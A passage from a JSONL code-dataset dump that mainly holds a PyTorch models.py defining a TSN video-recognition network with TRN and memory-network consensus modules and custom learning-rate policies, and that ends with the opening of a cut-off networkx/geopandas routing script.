number=10))\n","sub_path":"joel_protobuf_test/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"21151692","text":"from torch import nn\n\nfrom ops.basic_ops import ConsensusModule, Identity\nfrom transforms import *\nfrom torch.nn.init import normal, constant\n\nimport numpy as np\n\n\nimport TRNmodule\nimport MemNNmodule\n\n\n# removed: query_base_model, img_feature_dim\n# added : key_dim, value_dim, query_dim, query_update_method, hop_method, no_softmax_on_p\nclass TSN(nn.Module):\n    def __init__(self, num_class, num_segments, modality,\n                 base_model='resnet101', new_length=None,\n                 consensus_type='avg', before_softmax=True,\n                 dropout=0.8,key_dim=256,value_dim=256,query_dim=256,query_update_method=None,\n                 crop_num=1, partial_bn=True, freezeBN_Eval=False, freezeBN_Require_Grad_True=False, print_spec=True, num_hop=1, hop_method=None, \n                 num_CNNs=1, no_softmax_on_p=False, freezeBackbone=False, CustomPolicy=False, sorting=False, MultiStageLoss=False, MultiStageLoss_MLP=False, \\\n                 how_to_get_query='mean', only_query=False, CC=False, channel=1024, memory_dim=1, image_resolution=256,how_many_objects=1, Each_Embedding=False, Curriculum=False, Curriculum_dim=512, lr_steps=None):\n        super(TSN, self).__init__()\n        self.modality = modality\n        self.num_segments = num_segments\n        self.reshape = True\n        self.before_softmax = 
before_softmax\n self.dropout = dropout\n self.crop_num = crop_num\n self.consensus_type = consensus_type\n self.img_feature_dim = key_dim # the dimension of the CNN feature to represent each frame\n self.freezeBN_Eval = freezeBN_Eval\n self.freezeBN_Require_Grad_True = freezeBN_Require_Grad_True\n self.freezeBackbone = freezeBackbone\n self.CustomPolicy = CustomPolicy\n self.MultiStageLoss = MultiStageLoss\n self.CC = CC\n self.memory_dim = memory_dim\n self.image_resolution = image_resolution\n self.how_many_objects = how_many_objects\n self.Curriculum = Curriculum\n self.lr_steps = lr_steps\n\n # self.sorting = sorting\n\n if not before_softmax and consensus_type != 'avg':\n raise ValueError(\"Only avg consensus can be used after Softmax\")\n\n if new_length is None:\n self.new_length = 1 if modality == \"RGB\" else 5\n else:\n self.new_length = new_length\n if print_spec == True:\n print((\"\"\"\n Initializing TSN with base model: {}.\n TSN Configurations:\n input_modality: {}\n num_segments: {}\n new_length: {}\n consensus_module: {}\n dropout_ratio: {}\n img_feature_dim: {}\n \"\"\".format(base_model, self.modality, self.num_segments, self.new_length, consensus_type, self.dropout, self.img_feature_dim)))\n\n self._prepare_base_model(base_model) # assign 'self.base_model'\n\n\n feature_dim = self._prepare_tsn(num_class)\n\n if self.modality == 'Flow':\n print(\"Converting the ImageNet model to a flow init model\")\n self.base_model = self._construct_flow_model(self.base_model)\n print(\"Done. Flow model ready...\")\n elif self.modality == 'RGBDiff':\n print(\"Converting the ImageNet model to RGB+Diff init model\")\n self.base_model = self._construct_diff_model(self.base_model)\n print(\"Done. RGBDiff model ready.\")\n\n\n if consensus_type in ['TRN', 'TRNmultiscale']:\n # plug in the Temporal Relation Network Module\n self.consensus = TRNmodule.return_TRN(consensus_type, self.img_feature_dim, self.num_segments, num_class) # (relation_type, img_feature_dim, num_frames, num_class)\n elif consensus_type in ['MemNN']:\n self.consensus = MemNNmodule.return_MemNN(consensus_type, self.num_segments, num_class, \\\n key_dim=key_dim, value_dim=value_dim, query_dim=query_dim, memory_dim=memory_dim, query_update_method=query_update_method, \\\n no_softmax_on_p=no_softmax_on_p, channel=channel, num_hop=num_hop, hop_method=hop_method, num_CNNs=num_CNNs, \\\n sorting=sorting, MultiStageLoss=MultiStageLoss, MultiStageLoss_MLP=MultiStageLoss_MLP, how_to_get_query=how_to_get_query, only_query=only_query, CC=CC, how_many_objects=how_many_objects,\\\n Each_Embedding=Each_Embedding, Curriculum=Curriculum, Curriculum_dim=Curriculum_dim, lr_steps=lr_steps)\n else: # agv or something else\n self.consensus = ConsensusModule(consensus_type)\n\n if not self.before_softmax:\n self.softmax = nn.Softmax()\n\n self._enable_pbn = partial_bn\n if partial_bn:\n self.partialBN(True)\n\n def _prepare_tsn(self, num_class):\n try:\n feature_dim = getattr(self.base_model, self.base_model.last_layer_name).in_features # 1024\n except:\n feature_dim = None\n if self.base_model.last_layer_name is not None:\n raise ValueError(\"Something Wrong. 
Check\")\n\n if self.dropout == 0:\n if self.consensus_type in ['TRN','TRNmultiscale']:\n setattr(self.base_model, self.base_model.last_layer_name, nn.Linear(feature_dim, self.img_feature_dim))\n\n elif self.consensus_type in ['MemNN']:\n self.base_model = nn.Sequential(*list(self.base_model.children())[:-1]) # remove final FC layer\n # setattr(self.base_model, self.base_model.last_layer_name, nn.Linear(feature_dim, self.img_feature_dim))\n\n else:\n setattr(self.base_model, self.base_model.last_layer_name, nn.Linear(feature_dim, num_class))\n self.new_fc = None\n\n else: # dropout not ZERO\n try:\n setattr(self.base_model, self.base_model.last_layer_name, nn.Dropout(p=self.dropout))\n except:\n if self.base_model.last_layer_name is not None:\n raise ValueError(\"Something Wrong. Check\")\n\n if self.consensus_type in ['TRN','TRNmultiscale']:\n # create a new linear layer as the frame feature\n self.new_fc = nn.Linear(feature_dim, self.img_feature_dim)\n\n elif self.consensus_type in ['MemNN']:\n self.new_fc = None\n\n else:\n # the default consensus types in TSN\n self.new_fc = nn.Linear(feature_dim, num_class)\n\n std = 0.001\n if self.consensus_type not in ['MemNN']:\n if self.new_fc is None: # dropout 0\n normal(getattr(self.base_model, self.base_model.last_layer_name).weight, 0, std)\n constant(getattr(self.base_model, self.base_model.last_layer_name).bias, 0)\n else:\n normal(self.new_fc.weight, 0, std)\n constant(self.new_fc.bias, 0)\n\n return feature_dim # 1024 on BNInception\n\n def _prepare_base_model(self, base_model):\n if 'resnet' in base_model or 'vgg' in base_model:\n self.base_model = getattr(torchvision.models, base_model)(True)\n self.base_model.last_layer_name = 'fc'\n # print (self.base_model)# (conv1, bn1, relu, maxpool, layer1, layer2, layer3, layer4, avgpool, fc)\n\n if self.CC: # CC\n self.base_model_first_conv = self.base_model.conv1\n self.base_model_cc = nn.Conv2d(3, 64, 1, 2)\n self.base_model = nn.Sequential(*list(self.base_model.children())[1:])\n\n self.base_model.last_layer_name = '8'\n\n if self.memory_dim == 2:\n self.base_model = nn.Sequential(*list(self.base_model.children())[:-2])\n self.base_model.last_layer_name = None\n\n self.input_size = 224\n self.input_mean = [0.485, 0.456, 0.406]\n self.input_std = [0.229, 0.224, 0.225]\n\n if self.modality == 'Flow':\n self.input_mean = [0.5]\n self.input_std = [np.mean(self.input_std)]\n elif self.modality == 'RGBDiff':\n self.input_mean = self.input_mean + [0] * 3 * self.new_length\n self.input_std = self.input_std + [np.mean(self.input_std) * 2] * 3 * self.new_length\n\n elif base_model == 'BNInception':\n import model_zoo\n self.base_model = getattr(model_zoo, base_model)()\n self.base_model.last_layer_name = 'fc'\n self.input_size = 224\n self.input_mean = [104, 117, 128]\n self.input_std = [1]\n\n if self.modality == 'Flow':\n self.input_mean = [128]\n elif self.modality == 'RGBDiff':\n self.input_mean = self.input_mean * (1 + self.new_length)\n\n if self.CC:\n raise ValueError(\"CC is not supported on BNInception architecture.\")\n\n if self.memory_dim == 2:\n raise ValueError(\"memory_dim larger than 1 is not supported on BNInception architecture.\")\n # self.base_model_first_conv = nn.Sequential(*list(self.base_model.children())[:1])\n # self.base_model_cc = nn.Conv2d(3, 64, 1, 2)\n\n # self.base_model = self.base_model.children()\n # self.base_model.last_layer_name = '218'\n\n elif base_model == 'InceptionV3':\n import model_zoo\n self.base_model = getattr(model_zoo, base_model)()\n 
self.base_model.last_layer_name = 'top_cls_fc'\n self.input_size = 299\n self.input_mean = [104,117,128]\n self.input_std = [1]\n if self.modality == 'Flow':\n self.input_mean = [128]\n elif self.modality == 'RGBDiff':\n self.input_mean = self.input_mean * (1+self.new_length)\n elif 'inception' in base_model:\n import model_zoo\n self.base_model = getattr(model_zoo, base_model)()\n self.base_model.last_layer_name = 'classif'\n self.input_size = 299\n self.input_mean = [0.5]\n self.input_std = [0.5]\n else:\n raise ValueError('Unknown base model: {}'.format(base_model))\n\n def train(self, mode=True):\n \"\"\"\n Override the default train() to freeze the BN parameters\n :return:\n \"\"\"\n super(TSN, self).train(mode)\n\n count = 0\n if self._enable_pbn: # partial batch norm\n print(\"[Partial Batcn Norm] Freezing BatchNorm2D except the first one in base_model.\")\n for m in self.base_model.modules():\n if isinstance(m, nn.BatchNorm2d):\n count += 1\n if count >= (2 if self._enable_pbn else 1):\n m.eval()\n\n # shutdown update in frozen mode\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n\n if self.freezeBN_Eval:\n print(\"[Freezing BN] Make ALL BatchNorm2D eval mode in base_model.\")\n for m in self.base_model.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n\n # if self._enable_pbn==False: # partial batch norm\n # for m in self.base_model.modules():\n # if isinstance(m, nn.BatchNorm2d):\n\n # # shutdown update in frozen mode\n # if self.freezeBN_Require_Grad_True:\n # m.weight.requires_grad = True\n # m.bias.requires_grad = True\n # else:\n # m.weight.requires_grad = False\n # m.bias.requires_grad = False\n\n\n def partialBN(self, enable):\n self._enable_pbn = enable\n\n def get_optim_policies(self, epoch=0):\n # print (self.freezeBackbone)\n # asdf\n if self.freezeBackbone is False and self.CustomPolicy is False:\n first_conv_weight = []\n first_conv_bias = []\n normal_weight = []\n normal_bias = []\n bn = []\n\n conv_cnt = 0\n bn_cnt = 0\n for name, m in self.named_modules():\n # print (name, type(m))\n # if(name=='base_model'):\n # conv_cnt = 0\n # bn_cnt = 0\n print (name, m)\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d):\n ps = list(m.parameters())\n conv_cnt += 1\n if conv_cnt == 1:\n first_conv_weight.append(ps[0])\n if len(ps) == 2:\n first_conv_bias.append(ps[1])\n else:\n normal_weight.append(ps[0])\n if len(ps) == 2:\n normal_bias.append(ps[1])\n elif isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n normal_weight.append(ps[0])\n if len(ps) == 2:\n normal_bias.append(ps[1])\n elif isinstance(m, torch.nn.modules.rnn.LSTM):\n # print (m)\n # print (list(m.parameters()))\n # print (len(list(m.parameters())))\n ps = list(m.parameters())\n normal_weight.append(ps[0])\n normal_weight.append(ps[1])\n if len(ps) == 4:\n normal_bias.append(ps[2])\n normal_bias.append(ps[3])\n\n elif isinstance(m, torch.nn.BatchNorm1d):\n bn.extend(list(m.parameters()))\n elif isinstance(m, torch.nn.BatchNorm2d):\n bn_cnt += 1\n # later BN's are frozen\n # if not self._enable_pbn or bn_cnt == 1 or (self.freezeBN_Require_Grad_True is True):\n if not self._enable_pbn or bn_cnt == 1:\n bn.extend(list(m.parameters()))\n elif len(m._modules) == 0:\n if len(list(m.parameters())) > 0:\n raise ValueError(\"New atomic module type: {}. 
Need to give it a learning policy\".format(type(m)))\n\n\n # if self.consensus_type in ['MemNN']:\n return [\n {'params': first_conv_weight, 'lr_mult': 5 if self.modality == 'Flow' else 1, 'decay_mult': 1,\n 'name': \"first_conv_weight\"},\n {'params': first_conv_bias, 'lr_mult': 10 if self.modality == 'Flow' else 2, 'decay_mult': 0,\n 'name': \"first_conv_bias\"},\n {'params': normal_weight, 'lr_mult': 1, 'decay_mult': 1,\n 'name': \"normal_weight\"},\n {'params': normal_bias, 'lr_mult': 2, 'decay_mult': 0,\n 'name': \"normal_bias\"},\n {'params': bn, 'lr_mult': 1, 'decay_mult': 0,\n 'name': \"BN scale/shift\"},\n ]\n\n elif self.freezeBackbone is False and self.CustomPolicy:\n backbone_weight = []\n backbone_bias = []\n consensus_weight = []\n consensus_bias = []\n curr_hop1_weight = []\n curr_hop1_bias = []\n curr_hop2_weight = []\n curr_hop2_bias = []\n curr_hop3_weight = []\n curr_hop3_bias = []\n curr_classifier_weight = []\n curr_classifier_bias = []\n bn = []\n bn_cnt = 0\n\n for name, m in self.named_modules():\n # print (name, type(m))\n if epoch==0: print (name, m)\n if((('Curriculum_hop1' in name) or ('query_embedding1' in name) or ('KeyEmbedding1' in name) or ('ValueEmbedding1' in name)) and self.Curriculum):\n print (name, 'is in Curriculum_hop1')\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d) or isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n curr_hop1_weight.append(ps[0])\n if len(ps) == 2: curr_hop1_bias.append(ps[1])\n elif((('Curriculum_hop2' in name or ('query_embedding2' in name) or ('KeyEmbedding2' in name) or ('ValueEmbedding2' in name)) and self.Curriculum)):\n print (name, 'is in Curriculum_hop2')\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d) or isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n curr_hop2_weight.append(ps[0])\n if len(ps) == 2: curr_hop2_bias.append(ps[1])\n elif((('Curriculum_hop3' in name or ('query_embedding3' in name) or ('KeyEmbedding3' in name) or ('ValueEmbedding3' in name)) and self.Curriculum)):\n print (name, 'is in Curriculum_hop3')\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d) or isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n curr_hop3_weight.append(ps[0])\n if len(ps) == 2: curr_hop3_bias.append(ps[1])\n elif((('classifier' in name) and self.Curriculum)):\n print (name, 'is in classifier')\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d) or isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n curr_classifier_weight.append(ps[0])\n if len(ps) == 2: curr_classifier_bias.append(ps[1])\n elif('consensus' in name):\n print (name, 'is in Consensus')\n \n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d):\n ps = list(m.parameters())\n consensus_weight.append(ps[0])\n if len(ps) == 2: consensus_bias.append(ps[1])\n elif isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n consensus_weight.append(ps[0]) \n if len(ps) == 2: consensus_bias.append(ps[1])\n elif isinstance(m, torch.nn.modules.rnn.LSTM):\n ps = list(m.parameters())\n consensus_weight.append(ps[0])\n consensus_weight.append(ps[1])\n if len(ps) == 4:\n consensus_bias.append(ps[2])\n consensus_bias.append(ps[3])\n\n elif isinstance(m, torch.nn.BatchNorm1d):\n bn.extend(list(m.parameters()))\n elif isinstance(m, torch.nn.BatchNorm2d):\n bn_cnt += 1\n # 
later BN's are frozen\n # if not self._enable_pbn or bn_cnt == 1 and self.freezeBN is False:\n # if not self._enable_pbn or bn_cnt == 1 or (self.freezeBN_Require_Grad_True is True):\n if not self._enable_pbn or bn_cnt == 1:\n bn.extend(list(m.parameters()))\n elif len(m._modules) == 0:\n if len(list(m.parameters())) > 0:\n raise ValueError(\"New atomic module type: {}. Need to give it a learning policy\".format(type(m)))\n\n elif('base_model' in name):\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d):\n ps = list(m.parameters())\n backbone_weight.append(ps[0])\n if len(ps) == 2: backbone_bias.append(ps[1])\n elif isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n backbone_weight.append(ps[0])\n if len(ps) == 2: backbone_bias.append(ps[1])\n elif isinstance(m, torch.nn.modules.rnn.LSTM):\n ps = list(m.parameters())\n backbone_weight.append(ps[0])\n backbone_weight.append(ps[1])\n if len(ps) == 4:\n backbone_bias.append(ps[2])\n backbone_bias.append(ps[3])\n\n elif isinstance(m, torch.nn.BatchNorm1d):\n bn.extend(list(m.parameters()))\n elif isinstance(m, torch.nn.BatchNorm2d):\n bn_cnt += 1\n # later BN's are frozen\n # if not self._enable_pbn or bn_cnt == 1 and self.freezeBN is False:\n # if not self._enable_pbn or bn_cnt == 1 or (self.freezeBN_Require_Grad_True is True):\n if not self._enable_pbn or bn_cnt == 1:\n # print (name, 'is in BN')\n bn.extend(list(m.parameters()))\n elif len(m._modules) == 0:\n if len(list(m.parameters())) > 0:\n raise ValueError(\"New atomic module type: {}. Need to give it a learning policy\".format(type(m)))\n # asdf\n\n backbone_lr_mul = 0.1\n classifier_multiplier = 1\n if self.Curriculum:\n if epoch >= self.lr_steps[2]: # 15, 30, 40, 50\n classifier_multiplier = 50\n elif epoch >= self.lr_steps[3]:\n classifier_multiplier = 100\n return [\n {'params': backbone_weight, 'lr_mult': 5 if self.modality == 'Flow' else backbone_lr_mul, 'decay_mult': 1,\n 'name': \"backbone_weight\"},\n {'params': backbone_bias, 'lr_mult': 10 if self.modality == 'Flow' else backbone_lr_mul*2, 'decay_mult': 0,\n 'name': \"backbone_bias\"},\n {'params': consensus_weight, 'lr_mult': 1, 'decay_mult': 1,\n 'name': \"consensus_weight\"},\n {'params': consensus_bias, 'lr_mult': 2, 'decay_mult': 0,\n 'name': \"consensus_bias\"},\n\n {'params': curr_hop1_weight, 'lr_mult': 10, 'decay_mult': 1,\n 'name': \"curr_hop1_weight\"},\n {'params': curr_hop1_bias, 'lr_mult': 20, 'decay_mult': 0,\n 'name': \"curr_hop1_bias\"},\n\n {'params': curr_hop2_weight, 'lr_mult': 50, 'decay_mult': 1,\n 'name': \"curr_hop2_weight\"},\n {'params': curr_hop2_bias, 'lr_mult': 100, 'decay_mult': 0,\n 'name': \"curr_hop2_bias\"},\n\n {'params': curr_hop3_weight, 'lr_mult': 100, 'decay_mult': 1,\n 'name': \"curr_hop3_weight\"},\n {'params': curr_hop3_bias, 'lr_mult': 200, 'decay_mult': 0,\n 'name': \"curr_hop3_bias\"},\n\n {'params': curr_classifier_weight, 'lr_mult': classifier_multiplier, 'decay_mult': 1,\n 'name': \"curr_classifier_weight\"},\n {'params': curr_classifier_bias, 'lr_mult': classifier_multiplier*2, 'decay_mult': 0,\n 'name': \"curr_classifier_bias\"},\n\n {'params': bn, 'lr_mult': 1, 'decay_mult': 0,\n 'name': \"BN scale/shift\"},\n ]\n\n elif self.freezeBackbone:\n normal_weight = []\n normal_bias = []\n bn = []\n # normal_weight_name = []\n # normal_bias_name = []\n # bn_name = []\n\n for name, m in self.named_modules():\n print (name, type(m))\n if('consensus' in name) or (isinstance(m, torch.nn.Linear)):\n print 
('--------------------------------------------', name, m, '--------------------------------------------')\n if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.Conv3d):\n ps = list(m.parameters())\n normal_weight.append(ps[0])\n # normal_weight_name.append(name)\n if len(ps) == 2:\n normal_bias.append(ps[1])\n # normal_bias_name.append(name)\n elif isinstance(m, torch.nn.Linear):\n ps = list(m.parameters())\n normal_weight.append(ps[0])\n # normal_weight_name.append(name)\n if len(ps) == 2:\n normal_bias.append(ps[1])\n # normal_bias_name.append(name)\n elif isinstance(m, torch.nn.modules.rnn.LSTM):\n ps = list(m.parameters())\n normal_weight.append(ps[0])\n normal_weight.append(ps[1])\n if len(ps) == 4:\n normal_bias.append(ps[2])\n normal_bias.append(ps[3])\n\n elif isinstance(m, torch.nn.BatchNorm1d):\n bn.extend(list(m.parameters()))\n # bn_name.extend(name)\n elif isinstance(m, torch.nn.BatchNorm2d):\n # if not self._enable_pbn and self.freezeBN is False:\n # if not self._enable_pbn and self.freezeBN_Require_Grad_True is True:\n if not self._enable_pbn:\n bn.extend(list(m.parameters()))\n # bn_name.extend(name)\n elif len(m._modules) == 0:\n if len(list(m.parameters())) > 0:\n raise ValueError(\"New atomic module type: {}. Need to give it a learning policy\".format(type(m)))\n # print ('------------------------')\n # print (normal_weight_name)\n # print (normal_bias_name)\n # print (bn_name)\n # asdf\n\n return [\n {'params': normal_weight, 'lr_mult': 1, 'decay_mult': 1,\n 'name': \"normal_weight\"},\n {'params': normal_bias, 'lr_mult': 2, 'decay_mult': 0,\n 'name': \"normal_bias\"},\n {'params': bn, 'lr_mult': 1, 'decay_mult': 0,\n 'name': \"BN scale/shift\"},\n ]\n\n def Generate_grid(self, bs, temporal_length, size):\n oneset = []\n for t in range(temporal_length):\n tmap = torch.zeros(size) + t\n tmap = tmap / float(temporal_length)\n y = 0\n hmap = torch.arange(start=y, end=y+size[0]).view(-1,1).repeat(1,size[1]).float()\n hmap = hmap / 224.\n x = 0\n wmap = torch.arange(start=x, end=x+size[1]).view(1,-1).repeat(size[0], 1).float()\n wmap = wmap / 224.\n # print (torch.stack([tmap, hmap, wmap], dim=0))\n oneset.append(torch.stack([tmap, hmap, wmap], dim=0)) # 3, 224, 224\n # grid = torch.stack([tmap, hmap, wmap], dim=0)\n oneset = torch.stack(oneset,dim=0) # 8, 3, 224, 224\n allgrids = oneset.repeat(bs, 1, 1, 1) # bs*num_seg, 3, 224, 224\n # print (allgrids.view((bs, -1, 3) + size)) # bs, num_seg, 3, 224, 224\n # asdf\n\n return torch.autograd.Variable(allgrids.cuda())\n\n def forward(self, input, criterion, phase='eval', target=None, eval=False, epoch=None):\n # print (input.size()) # [72, 6, 224, 224] # [BS, num_seg * num_channel, h, w]\n\n sample_len = (3 if self.modality == \"RGB\" else 2) * self.new_length\n # new_length is 1 when RGB, otherwise 5\n\n if self.modality == 'RGBDiff':\n sample_len = 3 * self.new_length\n input = self._get_diff(input)\n\n # print (input.view((-1, sample_len) + input.size()[-2:]).size()) # (BS * num_seg, num_channel, h, w)\n if self.CC == False:\n base_out = self.base_model(input.view((-1, sample_len) + input.size()[-2:])) # BS * num_seg, num_channel, h, w\n # print (self.base_model)\n # print ('input size : ', input.view((-1, sample_len) + input.size()[-2:]).size()) # [120, 3, 224, 224]\n # print ('output size : ', base_out.size()) # [120, 2048]\n if self.consensus_type in ['MemNN'] and self.memory_dim==1:\n base_out = base_out.unsqueeze(-1)\n base_out = base_out.unsqueeze(-1)\n elif self.CC:\n # print 
(input.size()) # [bs, channel(3)*num_seg(8), 224, 224]\n # print (input.view((-1, sample_len) + input.size()[-2:]).size()) # [bs*num_seg(8), 3, 224, 224]\n first_conv_out = self.base_model_first_conv(input.view((-1, sample_len) + input.size()[-2:])) # 240, 64, 112, 112\n\n cc_grid = self.Generate_grid(input.size()[0], self.num_segments, (input.size()[2], input.size()[3])) # bs*num_seg(8), 3, 224, 224\n cc_out = self.base_model_cc(cc_grid) # 240, 64, 112, 112\n\n summation = first_conv_out + cc_out # 240, 64, 112, 112)\n\n base_out = self.base_model(summation) # 120(bs*num_seg), last_fc_dim, 1, 1 (1024 for BNInception, 2048 for ResNet50) # (bs*num_seg, last_feature_dim, 7, 7)\n # if self.consensus_type not in ['MemNN']:\n # base_out = base_out.squeeze(2)\n # base_out = base_out.squeeze(2)\n\n # print (self.base_model)\n # print ('input size : ', summation.size()) # [120, 64, 112, 112]\n # print ('output size : ', base_out.size()) # [120, 2048, 1, 1]\n\n\n if self.dropout > 0 and self.new_fc is not None:\n base_out = self.new_fc(base_out) # img_feature_dim\n # print (base_out.size()) # (BS * num_seg, img_feature_dim_OR_final_class_num)\n # base_out is class_logit when TSN, otherwise img_feature_dim when TRN\n\n # print (self.before_softmax) # True\n if not self.before_softmax:\n base_out = self.softmax(base_out)\n\n if self.reshape:\n base_out = base_out.view((-1, self.num_segments) + base_out.size()[1:])\n # ^^ bf : (BS * NUM_SEG, img_feature_dim_OR_final_class_num), (BS * NUM_SEG, img_feature_dim_OR_final_class_num, H, W)\n # ^^ af : (BS, NUM_SEG, img_feature_dim_OR_final_class_num), (BS, NUM_SEG, img_feature_dim_OR_final_class_num, H, W)\n\n\n # outputs : list of outputs of each prediction_branch (logits)\n if self.consensus_type in ['MemNN']:\n if eval:\n if self.how_many_objects == 2:\n outputs, attentions, attentions_2 = self.consensus(base_out, eval=eval, epoch=epoch) # output : logit\n else:\n outputs, attentions = self.consensus(base_out, eval=eval, epoch=epoch) # output : logit\n else:\n outputs = self.consensus(base_out, eval=eval, epoch=epoch) # output : logit\n else:\n outputs = [self.consensus(base_out).squeeze(1)]\n\n # Calculate Loss (Avg MultiStage Loss)\n total_loss = None\n total_output = None\n for idx, output in enumerate(outputs): # outputs : list of logits\n if total_loss is None:\n # output.size() : \n # target.size() : \n total_loss = criterion(output, target)\n total_output = nn.functional.softmax(output,1) # BS x 174\n else:\n total_loss += criterion(output, target)\n total_output += nn.functional.softmax(output,1) # BS x 174\n # print (idx, criterion(output, target))\n\n total_output = total_output / len(outputs)\n total_loss = total_loss / len(outputs)\n\n\n # if eval:\n # print (total_output, attentions, total_loss)\n # else:\n # print (total_output, total_loss)\n \n # total_loss = total_loss.mean()\n if eval and self.consensus_type in ['MemNN']:\n if self.how_many_objects == 2:\n return total_output, attentions, attentions_2, total_loss\n return total_output, attentions, total_loss\n else:\n return total_output, total_loss\n\n def _get_diff(self, input, keep_rgb=False):\n input_c = 3 if self.modality in [\"RGB\", \"RGBDiff\"] else 2\n input_view = input.view((-1, self.num_segments, self.new_length + 1, input_c,) + input.size()[2:])\n if keep_rgb:\n new_data = input_view.clone()\n else:\n new_data = input_view[:, :, 1:, :, :, :].clone()\n\n for x in reversed(list(range(1, self.new_length + 1))):\n if keep_rgb:\n new_data[:, :, x, :, :, :] = input_view[:, :, x, 
:, :, :] - input_view[:, :, x - 1, :, :, :]\n            else:\n                new_data[:, :, x - 1, :, :, :] = input_view[:, :, x, :, :, :] - input_view[:, :, x - 1, :, :, :]\n\n        return new_data\n\n\n    def _construct_flow_model(self, base_model):\n        # modify the convolution layers\n        # Torch models are usually defined in a hierarchical way.\n        # nn.modules.children() returns all sub-modules in a DFS manner\n        modules = list(self.base_model.modules())\n        first_conv_idx = list(filter(lambda x: isinstance(modules[x], nn.Conv2d), list(range(len(modules)))))[0]\n        conv_layer = modules[first_conv_idx]\n        container = modules[first_conv_idx - 1]\n\n        # modify parameters, assume the first blob contains the convolution kernels\n        params = [x.clone() for x in conv_layer.parameters()]\n        kernel_size = params[0].size()\n        new_kernel_size = kernel_size[:1] + (2 * self.new_length, ) + kernel_size[2:] # change number of channels\n        new_kernels = params[0].data.mean(dim=1, keepdim=True).expand(new_kernel_size).contiguous()\n\n        new_conv = nn.Conv2d(2 * self.new_length, conv_layer.out_channels,\n                             conv_layer.kernel_size, conv_layer.stride, conv_layer.padding,\n                             bias=True if len(params) == 2 else False)\n        new_conv.weight.data = new_kernels\n        if len(params) == 2:\n            new_conv.bias.data = params[1].data # add bias if necessary\n        layer_name = list(container.state_dict().keys())[0][:-7] # remove .weight suffix to get the layer name\n\n        # replace the first convolution layer\n        setattr(container, layer_name, new_conv)\n        return base_model\n\n    def _construct_diff_model(self, base_model, keep_rgb=False):\n        # modify the convolution layers\n        # Torch models are usually defined in a hierarchical way.\n        # nn.modules.children() returns all sub-modules in a DFS manner\n        modules = list(self.base_model.modules())\n        first_conv_idx = list(filter(lambda x: isinstance(modules[x], nn.Conv2d), list(range(len(modules)))))[0]\n        conv_layer = modules[first_conv_idx]\n        container = modules[first_conv_idx - 1]\n\n        # modify parameters, assume the first blob contains the convolution kernels\n        params = [x.clone() for x in conv_layer.parameters()]\n        kernel_size = params[0].size()\n        if not keep_rgb:\n            new_kernel_size = kernel_size[:1] + (3 * self.new_length,) + kernel_size[2:]\n            new_kernels = params[0].data.mean(dim=1, keepdim=True).expand(new_kernel_size).contiguous()\n        else:\n            new_kernel_size = kernel_size[:1] + (3 * self.new_length,) + kernel_size[2:]\n            new_kernels = torch.cat((params[0].data, params[0].data.mean(dim=1, keepdim=True).expand(new_kernel_size).contiguous()),\n                                    1)\n            new_kernel_size = kernel_size[:1] + (3 + 3 * self.new_length,) + kernel_size[2:]\n\n        new_conv = nn.Conv2d(new_kernel_size[1], conv_layer.out_channels,\n                             conv_layer.kernel_size, conv_layer.stride, conv_layer.padding,\n                             bias=True if len(params) == 2 else False)\n        new_conv.weight.data = new_kernels\n        if len(params) == 2:\n            new_conv.bias.data = params[1].data # add bias if necessary\n        layer_name = list(container.state_dict().keys())[0][:-7] # remove .weight suffix to get the layer name\n\n        # replace the first convolution layer\n        setattr(container, layer_name, new_conv)\n        return base_model\n\n    @property\n    def crop_size(self):\n        return self.input_size\n\n    @property\n    def scale_size(self):\n        return self.input_size * 256 // 224\n\n    def get_augmentation(self):\n        if self.modality == 'RGB':\n            scales = [1, .875, .75, .66]\n            max_distort = 1\n            if self.image_resolution==320:\n                scales = list(np.linspace(1,0.71,15)) # (320~224)\n                max_distort = 5\n            # if self.image_resolution==320: scales = [1, .9, .85, .8, 0.7]\n            return 
torchvision.transforms.Compose([GroupRandomScaleCrop(self.input_size, scales, fix_crop=False, max_distort=max_distort)])\n # return torchvision.transforms.Compose([GroupMultiScaleCrop(self.input_size, scales, fix_crop=False)])\n # , GroupRandomHorizontalFlip(is_flow=False)])\n elif self.modality == 'Flow':\n return torchvision.transforms.Compose([GroupMultiScaleCrop(self.input_size, [1, .875, .75], fix_crop=False)])\n # ,GroupRandomHorizontalFlip(is_flow=True)])\n elif self.modality == 'RGBDiff':\n return torchvision.transforms.Compose([GroupMultiScaleCrop(self.input_size, [1, .875, .75], fix_crop=False)])\n # ,GroupRandomHorizontalFlip(is_flow=False)])","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":37788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"263139740","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 5 14:15:54 2017\n\n@author: cenv0574\n\"\"\"\n\nimport networkx as nx\nimport os\nimport numpy as np\nimport json\nimport pandas as pd\nimport geopandas as gpd\nimport shapely.wkt\nimport shapely.ops\n\ndef get_path(n0, n1,sg):\n \"\"\"If n0 and n1 are connected nodes in the graph, this function\n return an array of point coordinates along the road linking\n 